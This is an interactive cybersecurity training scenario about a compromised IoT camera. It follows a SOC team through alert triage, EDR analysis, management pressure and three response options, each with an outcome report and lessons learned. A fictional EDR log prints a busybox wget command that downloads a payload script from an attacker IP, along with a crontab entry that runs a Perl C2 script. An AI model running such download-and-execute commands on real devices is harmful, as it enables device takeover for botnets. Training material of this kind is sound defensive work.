CyberScenario v1: IoT Crisis

Welcome to the Scenario

In this interactive scenario, you are a member of the ÇOLHAK Corporation's cybersecurity team. Your mission is to analyze an evolving security threat, make critical decisions, and protect the company from a potential disaster. Carefully evaluate the information presented at each step. Are you ready?

Simulation Roles

Sizin Rolünüz: Siber Güvenlik Ekibi Üyesi - ÇOLHAK Corporation'ın siber güvenlik ekibinin bir parçasısınız. Olay müdahalesinde aktif rol alacak, analizler yapacak ve kritik kararlar vereceksiniz.
Ezgi (Tier-1 SOC Analisti) - İlk uyarıları ve şüpheli aktiviteleri tespit eden ekibinizin gözü kulağı.
Alper (Tier-2 Analisti) - Ezgi'den gelen olayları daha derinlemesine analiz eden, teknik araştırmalar yürüten uzmanınız.
Ceyda (Siber Güvenlik Yöneticisi) - Siber güvenlik ekibinizin lideri ve kriz anında nihai kararları veren kişi. Stratejik rehberlik sağlar.
Satış Direktörü - Şirketin ticari operasyonlarından sorumlu, özellikle canlı demo gibi kritik iş süreçlerinin aksamasını istemeyen bir paydaş.
Finans Direktörü (CFO) - Şirketin finansal sağlığından sorumlu üst düzey yönetici.

🕒 07:15 – First Signal: Enriched SIEM Alert

As the day begins, Tier-1 SOC Analyst Ezgi notices a critical alert on the SIEM (Security Information and Event Management) dashboard. A correlation rule has been triggered: "Periodic Data Exfiltration from Critical Asset Network to Unknown C2 Server".

ALERT ID: 8451
TRIGGER: Correlation Rule - "Suspicious C2 Beaconing"
SOURCE IP: 10.10.30.15 (VLAN: IoT Devices)
HOSTNAME: KAMERA-3KAT-OKYANUS
SOURCE MAC: 00:1A:2B:3C:4D:5E
DESTINATION IP: 88.54.12.219 (Reputation: Low, Category: Unknown)
PROTOCOL: UDP/443
OBSERVATION: A 128KB data packet is being sent every 5 minutes for the last 3 hours.
PCAP SUMMARY: DNS query for 'update.serve-config.net' resolved to 88.54.12.219. UDP payload contains obfuscated Base64 strings.
MITRE ATT&CK MAPPING: T1041 (Exfiltration Over C2), T1571 (Non-Standard Port)

Ezgi: "This isn't normal traffic. The source IP appears to be on the IoT VLAN, and the destination is a suspicious address we haven't seen before. The MITRE mappings are also concerning. I'm escalating this to Tier-2 (Alper) immediately."

🕒 07:30 – Simultaneous Developments & First Decision Point

Almost at the same time as Ezgi's analysis, two different event logs appear in the system. As a team, you must decide which event to prioritize.

Event 1: Help Desk Ticket #7254

User: Ayşe Yılmaz

Subject: The camera in the 3rd Floor Ocean Meeting Room is constantly freezing and its web interface is very slow. There was no such problem yesterday morning.

Event 2: Critical System Alert #9112 (Red Herring)

System: Active Directory

Subject: Over 50 failed login attempts detected for the Chief Financial Officer (CFO) account in the last 15 minutes.

Team Lead: "We have two potentially serious incidents. One is a potential data leak, the other could be an attack on a high-level executive's account. Our resources are limited, which one do we focus on?"

🕒 07:50 – Mis-prioritization

The team decides to focus on the CFO's account. A quick investigation reveals that the CFO is on vacation abroad and was repeatedly trying to log in from their mobile device after forgetting their new password. The account is temporarily locked, and the situation is brought under control.

Alper: "That was a false positive. But we lost about 20 minutes investigating it. We need to get back to the other incident urgently. I hope we're not too late."

🧑‍💻 08:00 – Alper’s In-Depth Analysis

Tier-2 Analyst Alper correlates the SIEM alert with the help desk ticket. He queries the suspicious IP address `10.10.30.15` in the company's Asset Management System. The result is clear: The IP address belongs to a "SmartEye 3000" model IP camera in the 3rd Floor Ocean Meeting Room.

Alper takes his analysis a step further by checking the EDR (Endpoint Detection and Response) console and finds a critical piece of evidence:

EDR LOG - Device: KAMERA-3KAT-OKYANUS (10.10.30.15)
PROCESS: /bin/busybox
COMMAND: busybox wget http://88.54.12.219/payload.sh -O /tmp/p.sh
ACTION: 'p.sh' script executed. A crontab job was created containing the command 'perl /tmp/c2.pl'.

A quick internet search reveals a recently disclosed critical vulnerability (CVE-2025-1337) in this model's firmware. This vulnerability allows for unauthorized Remote Code Execution (RCE).

Alper: "Okay, it all makes sense now. The slowdown in the camera isn't a malfunction; it's a symptom. The device has been compromised via a known vulnerability, downloaded a payload, and is sending data to a C2 server as part of a botnet. We need to report this to our manager, Ceyda, immediately."

🕒 08:30 – Sudden Complication: Management Pressure

Just as Alper is preparing to present his findings to Ceyda, his phone rings. It's the Sales Director, and he sounds very tense.

Sales Director: "Is your team dealing with the camera in the Ocean Room? That camera needs to be operational in less than an hour, we have a live demo for a very important international client! You can't shut down the room, find a solution immediately!"

This new information reveals that the decision to be made has not only a technical but also an operational dimension. The pressure on the team has increased.

🏢 08:45 – Crisis Meeting and the Moment of Decision

Alper summarizes the situation for Cybersecurity Manager Ceyda: "We have an IP camera that has been compromised using the CVE-2025-1337 vulnerability. For now, it's only communicating with the outside with small data packets, which looks like 'beaconing' activity. We haven't detected any lateral movement within the network yet. However, the Sales Department needs that camera in less than an hour."

Ceyda: "Understood. Our time is limited, and we're under pressure. It seems we have three options. The decision is yours. What do we do?"

Make your decision as a team:

Option A: Isolate and Patch (The Safe Route)

Immediately disconnect the camera from the network. Take the device to a lab environment, capture its image, and update it with the latest firmware. The threat is stopped instantly.

Risk: We won't be able to learn more about who the attacker is or what their ultimate goal is. The sales presentation will be canceled.

Option B: Redirect to Honeypot (Risky Observation)

Redirect the camera's traffic to a "Honeypot" environment that is completely isolated from the main network. Secretly monitor the attacker's behaviors (TTPs) to gather valuable intelligence.

Risk: The attacker might notice the Honeypot or launch a more aggressive attack (e.g., ransomware) during observation.

Option C: Quarantine and Observe (Calculated Middle Ground)

Move the camera to an isolated VLAN with no internet access. Block its egress traffic but allow it to communicate with 'bait' assets on the local network to observe its actions. This could reveal lateral movement attempts.

Risk: A configuration error could allow the attacker to escape the quarantine. The sales presentation might still be delayed.

📊 Final Report: Threat Contained

The team decided to implement Option A. The camera's port was immediately disabled on the switch, and the device was physically removed to the lab. The sales presentation was canceled.

Results of Your Decision:

Affected Systems

1

Financial Loss

₺50,000

Data Loss

0%

Reputation Score

95/100

Action: The device was isolated from the network, and its image was taken for forensic analysis.
Finding: The analysis found a simple Perl script on the device, used to enlist it into a DDoS botnet.
Resolution: The device's firmware was updated, patching the vulnerability. A network scan revealed 3 other cameras of the same model that also needed patching, and they were updated.
Outcome: No data breach occurred. A minor cost was incurred due to operational disruption (canceled presentation), but the crisis was averted before it could escalate.

🚨 Final Report: Crisis Escalated!

The team decided to implement Option B. However, the experienced attacker noticed the Honeypot and launched an aggressive attack.

Results of Your Decision:

Affected Systems

4+

Financial Loss

₺15,000,000+

Data Loss

40%

Reputation Score

20/100

Action: Realizing they were being watched, the attacker changed their plan to fully exploit their access.
Finding: They began scanning the network for other vulnerable systems from the camera. By cracking a weak service account password, they made a lateral move to a file server.
Outcome: The attacker deployed ransomware on servers containing critical data from the Finance and HR departments. Company operations came to a standstill.
Crisis Management: The incident escalated into a data breach and a major operational crisis. Recovery efforts, consultant fees, and business losses reached massive proportions.

📊 Final Report: Intelligence Gathered, Threat Neutralized

The team decided to implement Option C. The camera was moved to a special VLAN with no internet access, and all its activity was monitored.

Results of Your Decision:

Affected Systems

1

Financial Loss

₺5,000

Data Loss

0%

Reputation Score

100/100

Action: The camera was left running in the isolated VLAN, and all its activities were monitored with an NDR (Network Detection and Response) tool.
Finding: The attacker was observed trying to scan the local network with `nmap` from the camera. This behavior provided valuable intelligence on the attacker's TTPs (Tactics, Techniques, and Procedures).
Resolution: Using the gathered intelligence, special firewall rules were written to block this type of lateral movement *before* patching the other cameras. Then, all vulnerable cameras were safely updated.
Outcome: The threat was stopped, and valuable information was gathered to proactively prevent similar future attacks. Apart from a minor delay in the sales presentation, there was no significant loss.

📌 Closing: Case Analysis and Lessons Learned

Technical Lessons

Asset Management: Keeping an up-to-date inventory of all devices on the network (especially IoT) is critical for rapid diagnosis during an incident.
Network Segmentation: IoT devices should be kept in separate VLANs, isolated from critical servers and user networks. This makes lateral movement more difficult.
Vulnerability Management: Regular vulnerability scans must be performed for device firmware and software, and patches must be applied quickly.
Deception Technologies: Honeypots and isolated observation environments, when used correctly, are powerful tools for understanding attacker tactics.

Procedural Lessons

Incident Prioritization: When multiple alerts occur, prioritizing correctly based on potential impact ensures efficient use of resources.
SIEM Rule Tuning: The sensitivity of correlation rules that detect activities like anomalous data exfiltration and beaconing should be continuously improved.
Inter-Departmental Communication: Correlating user complaints from the Help Desk with SOC alerts is vital for the early detection of incidents.

Strategic Lessons

Risk Appetite: The balance between "gathering intelligence" and "eliminating risk immediately" must be carefully evaluated with management in every incident.
Managing Pressure: Handling operational pressure from business units during an incident response is an integral part of the cybersecurity decision-making process.
Value of Early Intervention: Acting quickly and decisively when suspicious activity is detected is the most effective way to prevent a potential crisis.